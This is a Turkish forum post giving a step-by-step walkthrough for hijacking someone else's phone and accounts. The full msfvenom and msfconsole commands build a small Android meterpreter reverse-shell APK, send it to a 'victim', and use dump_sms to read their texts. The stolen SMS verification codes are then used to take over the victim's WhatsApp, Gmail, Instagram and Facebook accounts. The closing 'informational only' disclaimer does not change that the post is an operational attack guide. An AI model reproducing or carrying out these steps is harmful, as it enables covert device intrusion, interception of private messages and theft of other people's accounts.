• Hesap Oluştur
 • Oturum Aç

Termux ( Whatsapp Hack / Telefon Hack ) Metasploit

Termux    0

  • avatar

  Termux  23-08-2019, Saat: 17:51

  Kredi:
  #1
   
  Termux ( Whatsapp Hack / Telefon Hack ) Metasploit

  Başlıktan da gördüğünüz üzere "Apk" dosyalar artık nerdeyse hiç güvenli değil. Metasploit Termuxa ( Android linux uç birimi)da gelmiş bulunmaktadır.Metasploit kullananlarınız bilir.Bunun Kali Linux takinden farkı yoktur.Peki Termuxta Metasploit üzerinde ne yapıcağız ? Termux üzerindende bir apk dosyası yaparak bunu kurbana atarız apk dosyasının boyutu 8 kb - 10 kb dir.Kurban bu apk dosyasını mobil cihazına kurar ise Metasploit konsol bölümü olan "msfconsole" bölümünden kişin telefonuna belirli işlemler yapabilirsiniz.

  Bu konuda anlatılan Telefonunu hackleyip Sms lerini okuycağız. Ve Sms leri okurkende eğerki kişinin(Gmail hesabı, instagram, Facebook vs. ) Hesapları kişinin telefon numarası üzerine ise onlarıda hackliyebiliceğiz.

  Gerekli uygulamalar

  1 - Bir Whatsapp Uygulaması ( Whatsapp Business uygundur. )
  2 - Termux

  Termuxa metasploit yüklü değil ise hemen burdan nasıl yükleyeceğiniz öğrenebilirsiniz.?

  Evet herşey hazırsa aşağıdaki gibi kodları sırasıyla yazmaya başlayalım. Bu işlemi hata almadan yapabilmek için uygulama izinlerinden Depolamaya veya belleğe erişimizine izin vermeniz gerekiyor.


  1 - ./msfvenom -p android/meterpreter/reverse_tcp LHOST=ip adresinizi yazınız LPORT=4444 R > /sdcard/teknodestekteam.apk

  Not: 1. kod hata verirse aşağıdaki kodu yazınız.

  msfvenom -p android/meterpreter/reverse_tcp LHOST=[b]ip adresinizi yazınız LPORT=4444 R > /sdcard/teknodestekteam.apk[/b]

  Not2: Arkadaşlar yukarıdaki kodda değiştirmeniz gereken yerleri renklendirdim. ( İp adresinizi öğrenmek için termux uygulamasında yeni bir sekme açarak komut satırına ifconfig yazmanız yeterlidir. )


  2 - msfconsole veya ./msfconsole
  3 - use exploit/multi/handler
  4 - set payload android/meterpreter/reverse_tcp
  5 - set lhost ıp adresinizi yazınız
  6 - set lprot 4444
  7 - exploit

  Not3: Evet arkadaşlar şuan herşeyimiz hazır şimdi telefonunuz dosya yöneticisinde girdiğinizde teknodestekteam.apk adında hazırladığımız bir virüsümüz olacak bu apk dosyasını herhangibi farklı android cihaza gönderip açtığınızda ilgili telefonda istediğiniz her işlemi yapabilirsiniz )
  Örneğin; Whatsapp'ını nasıl hackleyecez bunun için kendi telefonunuzda 2.Whatsapp uygulamasını açıp apk dosyasını gönderdiğiniz kişinin telefon numarasını yazınız.Telefonunu yazdıktan sonra Whatsapp ilgili kişiye mesaj gönderecektir. Peki biz bu mesajı nasıl göreceğiz bunun için sırasıyla aşığıdaki kodları yazacağız.

  1. dump_sms
  2. ls
  3. exit
  4. ls
  Bu kodları yazdıktan sonra Termux uygulamasında sms_dump_21651...txt isminde bir dosya göreceksiniz. bu ismi kopyalayıp aşağıdaki kodu yazalım.  vim ( Kopyaladığınız dosya adını yapıştırınız ) Yani yapıştırdıktan sonra kod aşağıdaki gibi olacaktır.

  vim sms_dump_21651...txt  bu kodu yazıktan sonra sms içeriğini görebileceksiniz. Bu sayede Whatsapp ın gönderdiği kodu yazıp ilgili kişini Whatsapp ele geçirmiş olursunuz. Yine aynı şekilde Facebook Gmail, instagram v.s hesaplarıda telefon numarası ile almış ise bu şekilde ele geçirebilirsiniz.  Uyarı: Bu konuda bahsi geçen program kullanımı tamamiyle bilgi amaçlı olarak verilmiştir. İzinsiz başka kişilerinin bilgileri ele geçirmek tamamiyle suç olduğunu hatırlatmak isteriz. İzinsiz kullanımı sonucu ve oluşabilecek tüm sorunlardan teknodestekteam.com, yöneticileri ve konuyu yazan kullanıcı sorumlu değildir.
  (Son Düzenleme: 23-08-2019, Saat: 18:05, Düzenleyen: Termux.)
  Beğeni


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Whatsapp+ PLUS / (Özelleştirilebilir Mod'lu Versiyon) Tekno Destek Team 7 2,298 13-10-2019, Saat: 02:34
Son Yorum: ozcandiebirix
  Android Cihaza Metasploit Framework Kurmak Termux 0 2,145 23-08-2019, Saat: 16:55
Son Yorum: Termux
  Termux Banner Nasıl Yapılır ( Bhai4You ) Termux 0 3,742 22-08-2019, Saat: 23:38
Son Yorum: Termux
  Termux Nedir ? Nasıl Kullanılır ? Termux 0 1,944 22-08-2019, Saat: 22:54
Son Yorum: Termux
  Sosyal Medya HACK Hesap Çalma(ShellPhish) Termux 0 6,100 18-08-2019, Saat: 12:46
Son Yorum: Termux
Konuyu Okuyanlar: 3 Ziyaretçi

Hızlı Menü: